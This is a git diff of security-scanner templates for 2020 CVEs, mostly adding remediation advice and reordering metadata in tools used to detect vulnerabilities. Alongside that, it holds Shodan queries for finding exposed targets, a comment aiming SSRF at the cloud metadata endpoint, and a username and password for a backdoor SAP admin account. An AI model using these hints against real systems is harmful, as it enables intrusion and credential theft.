vendor: agentejo diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index 8c713b94b4..bfa76ac8f1 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). + remediation: | + Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability. reference: - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35951 @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-35951 cwe-id: CWE-306 epss-score: 0.00158 - cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* epss-percentile: 0.51651 + cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 - framework: wordpress vendor: expresstech product: quiz_and_survey_master + framework: wordpress tags: cve2020,wordpress,wp-plugin,wpscan,cve,intrusive http: diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index ed15f82fd5..50a2e77bf2 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + remediation: | + Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: - https://github.com/r0ck3t1973/rukovoditel/issues/4 - http://rukovoditel.com/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2020-35984 cwe-id: CWE-79 epss-score: 0.00127 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* epss-percentile: 0.46587 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" - shodan-query: http.favicon.hash:-1499940355 max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 8a9eb0612e..2ece3d397d 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + remediation: | + Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: - https://github.com/r0ck3t1973/rukovoditel/issues/3 - http://rukovoditel.com/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.00127 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* epss-percentile: 0.46587 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 261de4127a..fdb7b46403 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + remediation: | + Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: - https://github.com/r0ck3t1973/rukovoditel/issues/2 - http://rukovoditel.com/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.00127 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* epss-percentile: 0.46587 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" - shodan-query: http.favicon.hash:-1499940355 max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 5385f7ee19..0841c06c90 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + remediation: | + Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://github.com/r0ck3t1973/rukovoditel/issues/1 - http://rukovoditel.com/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2020-35987 cwe-id: CWE-79 epss-score: 0.00127 - cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* epss-percentile: 0.46587 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 5c3d98166f..f4b0146590 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49314 - https://www.tenable.com/cve/CVE-2020-36112 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-36112 cwe-id: CWE-89 epss-score: 0.48049 - cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* epss-percentile: 0.97007 + cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cse_bookstore_project diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index f36541a93a..38f5c0c88c 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. + remediation: | + Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://jira.atlassian.com/browse/JRASERVER-71559 @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-36289 cwe-id: CWE-863 epss-score: 0.97071 - cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* epss-percentile: 0.99658 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: data_center + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2020,jira,atlassian,unauth http: diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 7d057bacc4..4593a4b02e 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 - https://github.com/smartstore/SmartStoreNET @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-36365 cwe-id: CWE-601 epss-score: 0.00331 - cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* epss-percentile: 0.67387 + cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.html:'content="Smartstore' vendor: smartstore product: smartstorenet + shodan-query: http.html:'content="Smartstore' tags: cve,cve2020,redirect,smartstore http: diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index e12616fe10..10d46fdf44 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action. + remediation: | + Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 - https://nvd.nist.gov/vuln/detail/CVE-2020-36510 @@ -15,14 +17,14 @@ info: cve-id: CVE-2020-36510 cwe-id: CWE-79 epss-score: 0.00141 - cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49173 + cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: "false" - framework: wordpress + max-request: 1 vendor: codetipi product: 15zine + framework: wordpress tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan http: diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index f40c2e74b0..25d368937e 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -9,6 +9,8 @@ info: XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. + remediation: | + Apply the latest security patches or updates provided by IBM to mitigate the vulnerability. reference: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 @@ -21,13 +23,13 @@ info: cve-id: CVE-2020-4463 cwe-id: CWE-611 epss-score: 0.36503 - cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* epss-percentile: 0.96633 + cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:-399298961 vendor: ibm product: maximo_asset_management + shodan-query: http.favicon.hash:-399298961 tags: cve,cve2020,ibm,xxe,disclosure http: diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index b84b06255a..eaa5e1bb08 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47841 - https://phpgurukul.com/hospital-management-system-in-php/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2020-5191 cwe-id: CWE-79 epss-score: 0.00383 - cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* epss-percentile: 0.69634 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: phpgurukul product: hospital_management_system_in_php tags: cve2020,hms,cms,xss,authenticated,edb,cve diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 81575e071f..3a9961fc2a 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0. reference: - https://www.exploit-db.com/exploits/47840 - https://phpgurukul.com/hospital-management-system-in-php/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2020-5192 cwe-id: CWE-89 epss-score: 0.02275 - cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* epss-percentile: 0.88219 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: phpgurukul product: hospital_management_system_in_php tags: cve2020,hms,cms,sqli,authenticated,edb,cve diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index d334a2a970..7fff0718d8 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -5,19 +5,19 @@ info: author: rootxharsh,iamnoooob,dwisiswant0 severity: medium description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. + remediation: This issue is fixed in version 9.3.2. reference: - https://github.com/zeit/next.js/releases/tag/v9.3.2 - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj - https://nvd.nist.gov/vuln/detail/CVE-2020-5284 - remediation: This issue is fixed in version 9.3.2. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2020-5284 cwe-id: CWE-22,CWE-23 epss-score: 0.00152 - cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* epss-percentile: 0.50785 + cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index 75f3890923..c4b4830121 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0. reference: - https://cinzinga.com/CVE-2020-5307-5308/ - https://nvd.nist.gov/vuln/detail/CVE-2020-5307 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-5307 cwe-id: CWE-89 epss-score: 0.01326 - cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.84331 + cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpgurukul_dairy_farm_shop_management_system_project diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index e1c35ed2d5..420a19df8f 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. + remediation: | + Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability. reference: - https://pivotal.io/security/cve-2020-5405 - https://nvd.nist.gov/vuln/detail/CVE-2020-5405 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-5405 cwe-id: CWE-22,CWE-23 epss-score: 0.00258 - cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* epss-percentile: 0.6281 + cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index d213561407..9862e8a51a 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -5,6 +5,8 @@ info: author: mavericknerd severity: high description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack. + remediation: | + Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches. reference: - https://tanzu.vmware.com/security/cve-2020-5410 - https://nvd.nist.gov/vuln/detail/CVE-2020-5410 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-5410 cwe-id: CWE-22,CWE-23 epss-score: 0.9725 - cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* epss-percentile: 0.99762 + cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 482fae983c..7197156ee4 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability. reference: - https://tanzu.vmware.com/security/cve-2020-5412 - https://nvd.nist.gov/vuln/detail/CVE-2020-5412 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-5412 cwe-id: CWE-610,CWE-441 epss-score: 0.04418 - cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* epss-percentile: 0.91325 + cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware @@ -43,4 +45,4 @@ http: status: - 200 -# To get crithit, try http://169.254.169.254/latest/metadata/ +# To get crithit, try http://169.254.169.254/latest/metadata/ \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 375502e5a7..bc36a779aa 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2020-49 - https://nvd.nist.gov/vuln/detail/CVE-2020-5775 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-5775 cwe-id: CWE-918 epss-score: 0.00194 - cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* epss-percentile: 0.56373 + cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* metadata: max-request: 1 vendor: instructure diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 59fcded45a..f8d99a687e 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session. + remediation: | + Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation. reference: - https://www.tenable.com/security/research/tra-2020-51 - https://nvd.nist.gov/vuln/detail/CVE-2020-5776 @@ -14,13 +16,13 @@ info: cve-id: CVE-2020-5776 cwe-id: CWE-352 epss-score: 0.53597 - cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* epss-percentile: 0.97163 + cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 3 - shodan-query: http.component:"Magento" vendor: magmi_project product: magmi + shodan-query: http.component:"Magento" tags: magmi,magento,tenable,cve,cve2020 http: diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 6d1080c38a..31712c76b1 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. + remediation: | + Upgrade to version 0.7.24 or later to fix the authentication bypass vulnerability. reference: - https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35 - https://nvd.nist.gov/vuln/detail/CVE-2020-5777 @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-5777 cwe-id: CWE-287 epss-score: 0.02378 - cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* epss-percentile: 0.88457 + cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Magento" vendor: magmi_project product: magmi + shodan-query: http.component:"Magento" tags: plugin,tenable,cve,cve2020,magmi,magento,auth,bypass http: diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index b69e676937..5fce014723 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: UnRaid <=6.80 allows remote unauthenticated attackers to execute arbitrary code. + remediation: | + Upgrade UnRaid to a version higher than 6.80 to mitigate the vulnerability. reference: - https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-5847 cwe-id: CWE-94,CWE-668 epss-score: 0.97113 - cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:* epss-percentile: 0.99678 + cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: unraid diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 8efac8bf5c..8a4e4d8ca3 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0,ringo severity: critical description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. + remediation: | + Apply the necessary security patches or upgrade to a non-vulnerable version of F5 BIG-IP TMUI. reference: - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html @@ -24,8 +26,8 @@ info: cve-id: CVE-2020-5902 cwe-id: CWE-22 epss-score: 0.97566 - cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* epss-percentile: 0.99997 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 vendor: f5 diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 2d16470a9f..c6baa16471 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/ - https://nvd.nist.gov/vuln/detail/CVE-2020-6171 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-6171 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* epss-percentile: 0.47998 + cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: communilink diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 6f6f2e1060..44d50b4222 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -5,6 +5,8 @@ info: author: _generic_human_ severity: critical description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. + remediation: | + Apply the latest security patches provided by SAP to mitigate this vulnerability. reference: - https://launchpad.support.sap.com/#/notes/2890213 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305 @@ -19,8 +21,8 @@ info: cve-id: CVE-2020-6207 cwe-id: CWE-306 epss-score: 0.97442 - cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* epss-percentile: 0.99915 + cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index b956a590ce..ec79793e3f 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system. + remediation: | + Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability. reference: - https://launchpad.support.sap.com/#/notes/2934135 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-6287 cwe-id: CWE-306 epss-score: 0.97519 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* epss-percentile: 0.99976 + cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-266008933 vendor: sap product: netweaver_application_server_java + shodan-query: http.favicon.hash:-266008933 tags: cve,cve2020,sap,kev http: @@ -58,4 +60,4 @@ http: - 200 # userName - sapRpoc6351 -# password - Secure!PwD8890 +# password - Secure!PwD8890 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 3b6cc52b29..994a9fa875 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful 